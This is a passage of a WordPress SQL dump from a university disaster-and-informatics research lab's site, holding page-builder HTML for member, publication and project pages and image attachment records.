style-local-182-c214-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-683 style-local-182-c214 position-relative\" data-colibri-id=\"182-c214\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-684 style-local-182-c215 position-relative h-element\" data-colibri-id=\"182-c215\">\n<div class=\"h-heading__outer style-684 style-local-182-c215\">\n<h2 class=\"\">Alumni</h2>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-694 style-local-182-c216 position-relative\" data-colibri-id=\"182-c216\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-695-outer style-local-182-c217-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-695 style-local-182-c217 position-relative\" data-colibri-id=\"182-c217\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-700 style-local-182-c218 position-relative h-element\" data-colibri-id=\"182-c218\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1359 style-700-image style-local-182-c218-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-ruby_parcells-scaled-1-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-700-frameImage style-local-182-c218-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-global-transition-all h-heading style-699 style-local-182-c219 position-relative h-element\" data-colibri-id=\"182-c219\">\n<div class=\"h-heading__outer style-699 style-local-182-c219\">\n<h4 class=\"\">Ruby Parcells</h4>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-696-outer style-local-182-c220-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-696 style-local-182-c220 position-relative\" data-colibri-id=\"182-c220\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\"></div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-697-outer style-local-182-c221-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-697 style-local-182-c221 position-relative\" data-colibri-id=\"182-c221\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\"></div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-698-outer style-local-182-c222-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-698 style-local-182-c222 position-relative\" data-colibri-id=\"182-c222\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\"></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>','Members','','inherit','closed','closed','','182-autosave-v1','','','2023-09-26 21:06:27','2023-09-27 01:06:27','',182,'https://gsudice.dataconn.net/?p=1388',0,'revision','',0),(1391,1,'2023-09-26 21:17:36','2023-09-27 01:17:36','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg','cropped-patterson.jpg','','inherit','open','closed','','cropped-patterson-jpg','','','2023-09-26 21:17:36','2023-09-27 01:17:36','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg',0,'attachment','image/jpeg',0),(1394,1,'2023-09-26 21:36:34','2023-09-27 01:36:34','','Screen Shot 2023-09-26 at 9.33.41 PM','','inherit','open','closed','','screen-shot-2023-09-26-at-9-33-41-pm','','','2023-10-13 10:26:41','2023-10-13 14:26:41','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/Screen-Shot-2023-09-26-at-9.33.41-PM.png',0,'attachment','image/png',0),(1399,1,'2023-09-26 22:33:56','2023-09-27 02:33:56','','sara edwards1','','inherit','open','closed','','sara-edwards1','','','2023-09-26 22:33:56','2023-09-27 02:33:56','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg',0,'attachment','image/jpeg',0),(1408,1,'2023-09-28 15:50:33','2023-09-28 19:50:33','','Portrait-1','','inherit','open','closed','','portrait-1','','','2023-09-28 15:50:33','2023-09-28 19:50:33','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/Portrait-1.jpeg',0,'attachment','image/jpeg',0),(1416,1,'2023-09-28 16:15:51','2023-09-28 20:15:51','','rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790','','inherit','open','closed','','rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790','','','2023-09-28 16:15:51','2023-09-28 20:15:51','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg',0,'attachment','image/jpeg',0),(1417,1,'2023-09-28 16:15:59','2023-09-28 20:15:59','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg','cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg','','inherit','open','closed','','cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-jpg','','','2023-10-13 10:35:20','2023-10-13 14:35:20','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg',0,'attachment','image/jpeg',0),(1418,1,'2023-09-28 16:24:27','2023-09-28 20:24:27','','colibri-image-54.png','','inherit','open','closed','','colibri-image-54-png','','','2023-09-28 16:24:27','2023-09-28 20:24:27','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/colibri-image-54.png',0,'attachment','image/png',0),(1419,1,'2023-09-28 16:24:27','2023-09-28 20:24:27','','colibri-image-55.png','','inherit','open','closed','','colibri-image-55-png','','','2023-09-28 16:24:27','2023-09-28 20:24:27','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/colibri-image-55.png',0,'attachment','image/png',0),(1420,1,'2023-09-28 16:24:27','2023-09-28 20:24:27','','colibri-image-56.png','','inherit','open','closed','','colibri-image-56-png','','','2023-09-28 16:24:27','2023-09-28 20:24:27','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/colibri-image-56.png',0,'attachment','image/png',0),(1422,1,'2023-09-29 10:16:14','2023-09-29 14:16:14','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\r\n  <!---->\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-boxed-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\r\n            <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p><strong>2022</strong></p>\r\n                    <p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\r\n                    <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and\r\n                      Management in Rural Communities in Accra, Ghana: A Field Study Report.</p>\r\n                    <p><strong>2021</strong></p>\r\n                    <p>Northeim, K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.</p>\r\n                    <p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\r\n                    <p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\r\n                    <p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\r\n                    <p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\r\n                    <p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\r\n                    <p>O’Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\r\n                    <p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\r\n                    <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\r\n                    <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\r\n                    <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\r\n                      (pp. 1-6). IEEE.</p>\r\n                    <p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\r\n                      (pp. 631-640). IEEE.</p>\r\n                    <p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\r\n                      (pp. 505-506).</p>\r\n                    <p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\r\n                    <p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\r\n                      (S3) Workshop (pp. 1-2).</p>\r\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\r\n                    <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\r\n                    <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\r\n                    <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted\r\n                      Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\r\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\r\n                    <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\r\n                      Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>','Research','','inherit','closed','closed','','608-revision-v1','','','2023-09-29 10:16:14','2023-09-29 14:16:14','',608,'https://gsudice.dataconn.net/?p=1422',0,'revision','',0),(1423,1,'2023-09-29 10:17:51','2023-09-29 14:17:51','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\r\n  <!---->\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-339 style-local-126-c2 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-340 style-local-126-c3 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-341-outer style-local-126-c4-outer\">\r\n            <div data-colibri-id=\"126-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-341 style-local-126-c4 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c5\" class=\"h-global-transition-all h-heading style-342 style-local-126-c5 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-342 style-local-126-c5\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">AeMos: An Early Warning Systems for Aedes Mosquito Prediction</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c6\" class=\"h-text h-text-component style-344 style-local-126-c6 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that\r\n                      are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts\r\n                      of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-345-outer style-local-126-c7-outer\">\r\n            <div data-colibri-id=\"126-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-345 style-local-126-c7 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\r\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\r\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, and hybrid is similar to our approach to\r\n                      this research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\r\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\r\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\r\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\r\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\r\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\r\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\r\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\r\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\r\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\r\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">The DICE Data Repository </h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\r\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\r\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\r\n                      <br>\r\n                    </p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\r\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">Orpheus</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\r\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\r\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response 